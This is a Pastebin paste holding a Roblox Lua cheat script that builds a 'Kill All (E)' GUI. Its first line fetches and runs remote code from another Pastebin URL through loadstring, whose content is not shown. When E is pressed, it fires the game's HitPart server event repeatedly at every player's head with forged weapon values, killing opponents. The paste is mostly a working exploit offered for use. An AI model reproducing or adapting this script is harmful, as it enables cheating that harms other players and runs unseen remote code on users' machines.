TrApplicationServer

Test

Jun 13th, 2021 (edited)
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.52 KB | None | 0 0
  1. loadstring(game:HttpGet('https://pastebin.com/raw/TS7Tb87R'))()
  2.  
  3. local ScreenGui = Instance.new("ScreenGui")
  4. local Frame = Instance.new("Frame")
  5. local TextLabel = Instance.new("TextLabel")
  6. local TextButton = Instance.new("TextButton")
  7.  
  8. --Properties:
  9.  
  10. ScreenGui.Parent = game.Workspace
  11.  
  12. Frame.Parent = ScreenGui
  13. Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  14. Frame.Position = UDim2.new(0.906131744, 0, 0.847665846, 0)
  15. Frame.Size = UDim2.new(0, 100, 0, 100)
  16.  
  17. TextLabel.Parent = Frame
  18. TextLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  19. TextLabel.Size = UDim2.new(0, 100, 0, 50)
  20. TextLabel.Font = Enum.Font.SciFi
  21. TextLabel.Text = "App's GUI v1"
  22. TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
  23. TextLabel.TextSize = 14.000
  24.  
  25. TextButton.Parent = Frame
  26. TextButton.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  27. TextButton.Position = UDim2.new(0, 0, 0.5, 0)
  28. TextButton.Size = UDim2.new(0, 100, 0, 50)
  29. TextButton.Font = Enum.Font.SciFi
  30. TextButton.Text = "Kill All (E)"
  31. TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  32. TextButton.TextSize = 14.000
  33. TextButton.MouseButton1Down:connect(function()
  34. game.Players.LocalPlayer:GetMouse().KeyDown:Connect(function(k)
  35. if k == "e" then
  36. local Gun = game.ReplicatedStorage.Weapons:FindFirstChild(game.Players.LocalPlayer.NRPBS.EquippedTool.Value);
  37. local Crit = math.random() > .6 and true or false;
  38. for i,v in pairs(game.Players:GetPlayers()) do
  39. if v and v.Character and v.Character:FindFirstChild("Head") then
  40. local Distance = (game.Players.LocalPlayer.Character.Head.Position - v.Character.Head.Position).magnitude
  41. for i = 1,10 do
  42. game.ReplicatedStorage.Events.HitPart:FireServer(v.Character.Head,
  43. v.Character.Head.Position + Vector3.new(math.random(), math.random(), math.random()),
  44. Gun.Name,
  45. Crit and 2 or 1,
  46. Distance,
  47. Backstab,
  48. Crit,
  49. false,
  50. 1,
  51. false,
  52. Gun.FireRate.Value,
  53. Gun.ReloadTime.Value,
  54. Gun.Ammo.Value,
  55. Gun.StoredAmmo.Value,
  56. Gun.Bullets.Value,
  57. Gun.EquipTime.Value,
  58. Gun.RecoilControl.Value,
  59. Gun.Auto.Value,
  60. Gun['Speed%'].Value,
  61. game.ReplicatedStorage.wkspc.DistributedTime.Value);
  62. end
  63. end
  64. end
  65. end
  66. end)
  67. end)
  68. -- Scripts:
  69.  
  70. local function DNDYDP_fake_script() -- ScreenGui.Script
  71. local script = Instance.new('Script', ScreenGui)
  72.  
  73. frame = script.Parent.Frame
  74. frame.Draggable = true
  75. frame.Active = true
  76. frame.Selectable = true
  77. end
  78. coroutine.wrap(DNDYDP_fake_script)()
  79.  
Add Comment
Please, Sign In to add comment